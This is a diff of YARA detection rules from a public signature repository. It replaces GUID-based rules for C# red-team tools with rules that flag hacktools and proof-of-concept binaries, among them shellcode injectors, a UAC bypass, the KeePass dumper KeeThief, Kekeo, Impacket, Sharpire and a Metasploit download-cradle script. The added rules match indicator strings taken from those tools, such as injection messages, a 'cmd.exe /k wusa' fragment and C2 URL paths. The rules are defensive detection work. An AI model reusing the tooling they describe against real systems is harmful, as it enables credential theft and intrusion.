-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "249da967-68b0-59b1-b414-4eb4fe67b8f3"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/zerosum0x0/RunShellcode"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L158-L171"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6de89a84-fe16-5064-8cbb-a3b9003f4c0c"
+		date = "2017-07-07"
+		modified = "2025-12-18"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3754-L3774"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5df20e170651f32e41a905992d0bb52542638e2d0a56841db900b70e324c9afe"
+		logic_hash = "37ed19fe19d3645adcd5fa7d6f6b3572d2821fdb78a6d0c8afdba6ccecfc8528"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ba0e2119b2a6bad612e86662b643a404426a07444d476472a71452b7e9f94041"
 
 	strings:
-		$typelibguid0lo = "a3ec18a3-674c-4131-a7f5-acbed034b819" ascii wide
+		$x1 = "\\Release\\injector.pdb" ascii
+		$x2 = "Cannot write the shellcode in the process memory, error: " fullword ascii
+		$x3 = "/s shellcode_file PID: shellcode injection." fullword ascii
+		$x4 = "/d dll_file PID: dll injection via LoadLibrary()." fullword ascii
+		$x5 = "/s shellcode_file PID" fullword ascii
+		$x6 = "Shellcode copied in memory: OK" fullword ascii
+		$x7 = "Usage of the injector. " fullword ascii
+		$x8 = "KO: cannot obtain the SeDebug privilege." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and 1 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharploginprompt : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Lpe_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e9a493d9-21b6-5ff1-9e5e-e8fbacc34c0c"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/shantanu561993/SharpLoginPrompt"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L173-L186"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9326bbae-81ee-588e-8581-628b47d348f8"
+		date = "2017-07-07"
+		modified = "2025-12-18"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3776-L3791"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e8abbc67d568956bf98e733b1e98910d0501225d4a0dc0bec6be9b572fcc2b36"
+		logic_hash = "e9ca23e4375674ea189d5e9de015f6a1ae16c30d35378580bdc8f42007b716df"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b4f3787a19b71c47bc4357a5a77ffb456e2f71fd858079d93e694a6a79f66533"
 
 	strings:
-		$typelibguid0lo = "c12e69cd-78a0-4960-af7e-88cbd794af97" ascii wide
+		$s1 = "\\cmd.exe\" /k wusa c:\\users\\" ascii
+		$s2 = "D:\\gitpoc\\UAC\\src\\x64\\Release\\lpe.pdb" fullword ascii
+		$s3 = "Folder Created: " fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Adamantium_Thief : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Shellcodegenerator : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "82225b2e-ab4a-50b8-a3fd-7ad4947d052e"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/LimerBoy/Adamantium-Thief"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L188-L201"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "49250cbe-7bbd-5462-9324-1a8f350386f3"
+		date = "2017-07-07"
+		modified = "2025-12-18"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3793-L3806"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "37303dd37952d08ca2f85d03b4a9a8d52a3c55870e1350bca7ac84749942dfd8"
+		logic_hash = "b267a816871c30e9403805b942be25ed8e28ad2fd946f234f6877a65420754d8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "55c4073bf8d38df7d392aebf9aed2304109d92229971ffac6e1c448986a87916"
 
 	strings:
-		$typelibguid0lo = "e6104bc9-fea9-4ee9-b919-28156c1f2ede" ascii wide
+		$x1 = "\\Release\\shellcodegenerator.pdb" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Psbypassclm : FILE
+rule SIGNATURE_BASE_Securityxploded_Producer_String : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "dad6729f-3d96-5d2d-b72c-a96d1a3eae74"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/padovah4ck/PSByPassCLM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L203-L216"
+		description = "Detects hacktools by SecurityXploded"
+		author = "Florian Roth (Nextron Systems)"
+		id = "739c4ba1-5126-51cc-a2dd-cdac2737e29a"
+		date = "2017-07-13"
+		modified = "2025-12-18"
+		reference = "http://securityxploded.com/browser-password-dump.php"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3808-L3822"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a2646ff961b5fc94035fae0b7e5afedc054dfcfe710701dbf9ba17674c2bb6c8"
-		score = 75
+		logic_hash = "101e0b8b8aeb8ed4314bc07139dcc2b40600fde82ff786d15a15c10692f9aa4a"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59"
 
 	strings:
-		$typelibguid0lo = "46034038-0113-4d75-81fd-eb3b483f2662" ascii wide
+		$x1 = "http://securityxploded.com" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Physmem2Profit : FILE
+rule SIGNATURE_BASE_Kekeo_Hacktool : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "75a27970-c469-53da-b0c3-b3d0faea0b6f"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/FSecureLABS/physmem2profit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L218-L231"
+		description = "Detects Kekeo Hacktool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a4158da8-fc4d-5dc6-b44c-f5325b3bb8ca"
+		date = "2017-07-21"
+		modified = "2025-12-18"
+		reference = "https://github.com/gentilkiwi/kekeo/releases"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3834-L3849"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "57e6159bc047c372bb7fa9ac0f77183fe06fe3f41b83039f8b0185f2743cc774"
+		logic_hash = "14283064e7c8fcee9cde206d25b43b02876a7a4d5de9da6dab47d7f5ba54f019"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ce92c0bcdf63347d84824a02b7a448cf49dd9f44db2d02722d01c72556a2b767"
+		hash2 = "49d7fec5feff20b3b57b26faccd50bc05c71f1dddf5800eb4abaca14b83bba8c"
 
 	strings:
-		$typelibguid0lo = "814708c9-2320-42d2-a45f-31e42da06a94" ascii wide
+		$x1 = "[ticket %u] session Key is NULL, maybe a TGT without enough rights when WCE dumped it." fullword wide
+		$x2 = "ERROR kuhl_m_smb_time ; Invalid! Command: %02x - Status: %08x" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Noamci : FILE
+rule SIGNATURE_BASE_Allthethings : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5fab1551-9d35-53cf-a04f-c14370119553"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/med0x2e/NoAmci"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L233-L246"
+		description = "Detects AllTheThings"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c3169ca7-3482-5d55-a1d9-6d1c01349922"
+		date = "2017-07-27"
+		modified = "2022-12-21"
+		reference = "https://github.com/subTee/AllTheThings"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3861-L3880"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7d934503bab7318930f958b1818037f00d3d5be7f5f89f3b519c5072bb4fee03"
+		logic_hash = "0d6b961afb98cfaefe930a7bc246b3f087469b752a8d4abb62b2826418fdfd53"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5a0e9a9ce00d843ea95bd5333b6ab50cc5b1dbea648cc819cfe48482513ce842"
 
 	strings:
-		$typelibguid0lo = "352e80ec-72a5-4aa6-aabe-4f9a20393e8e" ascii wide
+		$x1 = "\\obj\\Debug\\AllTheThings.pdb" ascii
+		$x2 = "AllTheThings.exe" fullword wide
+		$x3 = "\\AllTheThings.dll" ascii
+		$x4 = "Hello From Main...I Don't Do Anything" fullword wide
+		$x5 = "I am a basic COM Object" fullword wide
+		$x6 = "I shouldn't really execute either." fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpblock : FILE
+rule SIGNATURE_BASE_Impacket_Keyword : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b84538da-1b0e-50c7-abfa-e93d6de5a49b"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/CCob/SharpBlock"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L248-L261"
+		description = "Detects Impacket Keyword in Executable"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a92962e6-1b05-583b-8b06-f226bdea88e2"
+		date = "2017-08-04"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3882-L3899"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7bc689efc6f89ac685f1066da4e9735a0e2b985008679c51e14664cebdaebe4a"
-		score = 75
+		logic_hash = "92a911dc36f8e74ad49ae09ef4dd997b968a2dde46a7500c98983fafb84a086e"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9388c78ea6a78dbea307470c94848ae2481481f593d878da7763e649eaab4068"
+		hash2 = "2f6d95e0e15174cfe8e30aaa2c53c74fdd13f9231406b7103da1e099c08be409"
 
 	strings:
-		$typelibguid0lo = "3cf25e04-27e4-4d19-945e-dadc37c81152" ascii wide
+		$s1 = "impacket.smb(" ascii
+		$s2 = "impacket.ntlm(" ascii
+		$s3 = "impacket.nmb(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 14000KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Nopowershell : FILE
+rule SIGNATURE_BASE_Passwordspro : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0fd7496b-e34f-51f7-9270-ad424ed6a7a8"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/bitsadmin/nopowershell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L263-L276"
+		description = "Auto-generated rule - file PasswordsPro.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c749f883-364e-5f65-9eb8-3dcd74495f7c"
+		date = "2017-08-27"
+		modified = "2025-12-18"
+		reference = "PasswordPro"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3912-L3930"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5e4088d451cdc939608fb82f0259d3b60ce8247dfd2f76de839681c9e3d60414"
+		logic_hash = "24887c3a7e4997c9a4e5d3317a5684b0eca7ccc0ffb213660dd9b37bb220f514"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5b3d6654e6d9dc49ee1136c0c8e8122cb0d284562447abfdc05dfe38c79f95bf"
 
 	strings:
-		$typelibguid0lo = "555ad0ac-1fdb-4016-8257-170a74cb2f55" ascii wide
+		$s1 = "No users marked for attack or all marked users already have passwords found!" fullword ascii
+		$s2 = "%s\\PasswordsPro.ini.Dictionaries(%d)" fullword ascii
+		$s3 = "Passwords processed since attack start:" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Limelogger : FILE
+
+rule SIGNATURE_BASE_Passwordpro_NTLM_DLL : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0798f01b-76b7-5c4d-9ddb-5e377b86f8b9"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/LimeLogger"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L278-L291"
+		description = "Auto-generated rule - file NTLM.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cc86b868-000f-56b1-91cd-4aa8caace1df"
+		date = "2017-08-27"
+		modified = "2025-12-18"
+		reference = "PasswordPro"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3932-L3950"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "58588726f5f548b9aa948eac6d752404aa43fed18ccd4340422a652b9b061c9b"
+		logic_hash = "1021fe1a4c7a237d7a7cfcb1db8fa5e6fa640d3dd9f14ed37910a6b847717d36"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "47d4755d31bb96147e6230d8ea1ecc3065da8e557e8176435ccbcaea16fe50de"
 
 	strings:
-		$typelibguid0lo = "068d14ef-f0a1-4f9d-8e27-58b4317830c6" ascii wide
+		$s1 = "NTLM.dll" fullword ascii
+		$s2 = "Algorithm: NTLM" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and pe.exports ( "GetHash" ) and pe.exports ( "GetInfo" ) and ( all of them ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Aggressorscripts : FILE
+rule SIGNATURE_BASE_Keethief_PS : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d5903db5-010b-5b9d-8a5b-5d61aec52e7a"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/harleyQu1nn/AggressorScripts"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L293-L306"
+		description = "Detects component of KeeTheft - KeePass dump tool - file KeeThief.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9a54e8d1-3cae-51e8-8da0-024ac25dc6d0"
+		date = "2017-08-29"
+		modified = "2025-12-18"
+		reference = "https://github.com/HarmJ0y/KeeThief"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3962-L3979"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b5d84b6dea0290b901f1d911f341a2b15ab42cf9197775d9bb2f613f4baeb69d"
+		logic_hash = "8d3d4ff3b854c5efad99e6f20121b16d5f2f0a31a4c8efd87a937f857923a5e1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a3b976279ded8e64b548c1d487212b46b03aaec02cb6e199ea620bd04b8de42f"
 
 	strings:
-		$typelibguid0lo = "afd1ff09-2632-4087-a30c-43591f32e4e8" ascii wide
+		$x1 = "$WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\"" fullword ascii
+		$x2 = "if($KeePassProcess.FileVersion -match '^2\\.') {" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x7223 and filesize < 1000KB and ( 1 of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Gopher : FILE
+rule SIGNATURE_BASE_Keetheft_EXE : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e3015719-9085-584d-8237-f377ec995149"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/EncodeGroup/Gopher"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L308-L321"
+		description = "Detects component of KeeTheft - KeePass dump tool - file KeeTheft.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "65531239-c5fa-5285-8f44-2d858e211c9b"
+		date = "2017-08-29"
+		modified = "2025-12-18"
+		reference = "https://github.com/HarmJ0y/KeeThief"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3981-L4000"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "430727d064ae07a4ca4411ee78fe74c684ce21d287283467c1afb9795545003e"
+		logic_hash = "a6019248ad9708b1508fdf77a2ecbe92a7e8aac916fbca88aec117abeb07b9a0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f06789c3e9fe93c165889799608e59dda6b10331b931601c2b5ae06ede41dc22"
 
 	strings:
-		$typelibguid0lo = "b5152683-2514-49ce-9aca-1bc43df1e234" ascii wide
+		$x1 = "Error: Could not create a thread for the shellcode" fullword wide
+		$x2 = "Could not find address marker in shellcode" fullword wide
+		$x3 = "GenerateDecryptionShellCode" fullword ascii
+		$x4 = "KeePassLib.Keys.KcpPassword" fullword wide
+		$x5 = "************ Found a CompositeKey! **********" fullword wide
+		$x6 = "*** Interesting... there are multiple .NET runtimes loaded in KeePass" fullword wide
+		$x7 = "GetKcpPasswordInfo" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Aviator : FILE
+rule SIGNATURE_BASE_Keetheft_Out_Shellcode : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "52acd520-52aa-5bb9-ab3b-66a940aa5f5a"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/Ch0pin/AVIator"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L323-L336"
+		description = "Detects component of KeeTheft - KeePass dump tool - file Out-Shellcode.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1263ad5d-5d50-50e6-ad78-9d5e4e16634b"
+		date = "2017-08-29"
+		modified = "2025-12-18"
+		reference = "https://github.com/HarmJ0y/KeeThief"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4002-L4016"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9101444f7d9306058a42b0325fefc0a088d1669932e4a6ba23b387829f01a097"
+		logic_hash = "2d536edf1a40defc3b3aa7ce8e595c53e7dd3b7f1daea772c13319ee5bf7675e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2afb1c8c82363a0ae43cad9d448dd20bb7d2762aa5ed3672cd8e14dee568e16b"
 
 	strings:
-		$typelibguid0lo = "4885a4a3-4dfa-486c-b378-ae94a221661a" ascii wide
+		$x1 = "Write-Host \"Shellcode length: 0x$(($ShellcodeLength + 1).ToString('X4'))\"" fullword ascii
+		$x2 = "$TextSectionInfo = @($MapContents | Where-Object { $_ -match '\\.text\\W+CODE' })[0]" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( filesize < 2KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Njcrypter : FILE
+rule SIGNATURE_BASE_Sharpire : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c30c8323-9418-521a-a4fc-6be0113b99b5"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/0xPh0enix/njCrypter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L338-L352"
+		description = "Auto-generated rule - file Sharpire.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "747f2798-4f93-5073-b358-969060a1c937"
+		date = "2017-09-23"
+		modified = "2022-12-21"
+		reference = "https://github.com/0xbadjuju/Sharpire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4026-L4049"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2e3c616b75e15ad082cf0871b7ef8e04f0c2a937000f4bea6927962451ac7f12"
+		logic_hash = "1437b4c5229761bcc18d97ea6328866f4b9c763461fa6ecb5c18e6f3961c3114"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "327a1dc2876cd9d7f6a5b3777373087296fc809d466e42861adcf09986c6e587"
 
 	strings:
-		$typelibguid0lo = "8a87b003-4b43-467b-a509-0c8be05bf5a5" ascii wide
-		$typelibguid1lo = "80b13bff-24a5-4193-8e51-c62a414060ec" ascii wide
+		$x1 = "\\obj\\Debug\\Sharpire.pdb" ascii
+		$x2 = "[*] Upload of $fileName successful" fullword wide
+		$s1 = "no shell command supplied" fullword wide
+		$s2 = "/login/process.php" fullword wide
+		$s3 = "invokeShellCommand" fullword ascii
+		$s4 = "..Command execution completed." fullword wide
+		$s5 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword wide
+		$s6 = "/admin/get.php" fullword wide
+		$s7 = "[!] Error in stopping job: " fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) and 3 of them ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpminidump : FILE
+rule SIGNATURE_BASE_Invoke_Metasploit : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e91e6711-d992-5a8a-97e6-1ed7847f38a4"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/b4rtik/SharpMiniDump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L354-L367"
+		description = "Detects Invoke-Metasploit Payload"
+		author = "Florian Roth (Nextron Systems)"
+		id = "40452884-df3f-5b49-ad10-05006cb115f2"
+		date = "2017-09-23"
+		modified = "2025-12-18"
+		reference = "https://github.com/jaredhaight/Invoke-MetasploitPayload/blob/master/Invoke-MetasploitPayload.ps1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4059-L4074"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eea9a60c5d0acb1ffa7cbfec59f2a3f7f29b507fba2c3694480627c583d24c97"
+		logic_hash = "7ef174008517b101be844e30890626378f49a275bad3f08ce25fb8d6118c77c3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b36d3ca7073741c8a48c578edaa6d3b6a8c3c4413e961a83ad08ad128b843e0b"
 
 	strings:
-		$typelibguid0lo = "6ffccf81-6c3c-4d3f-b15f-35a86d0b497f" ascii wide
+		$s1 = "[*] Looks like we're 64bit, using regular powershell.exe" ascii wide
+		$s2 = "[*] Kicking off download cradle in a new process"
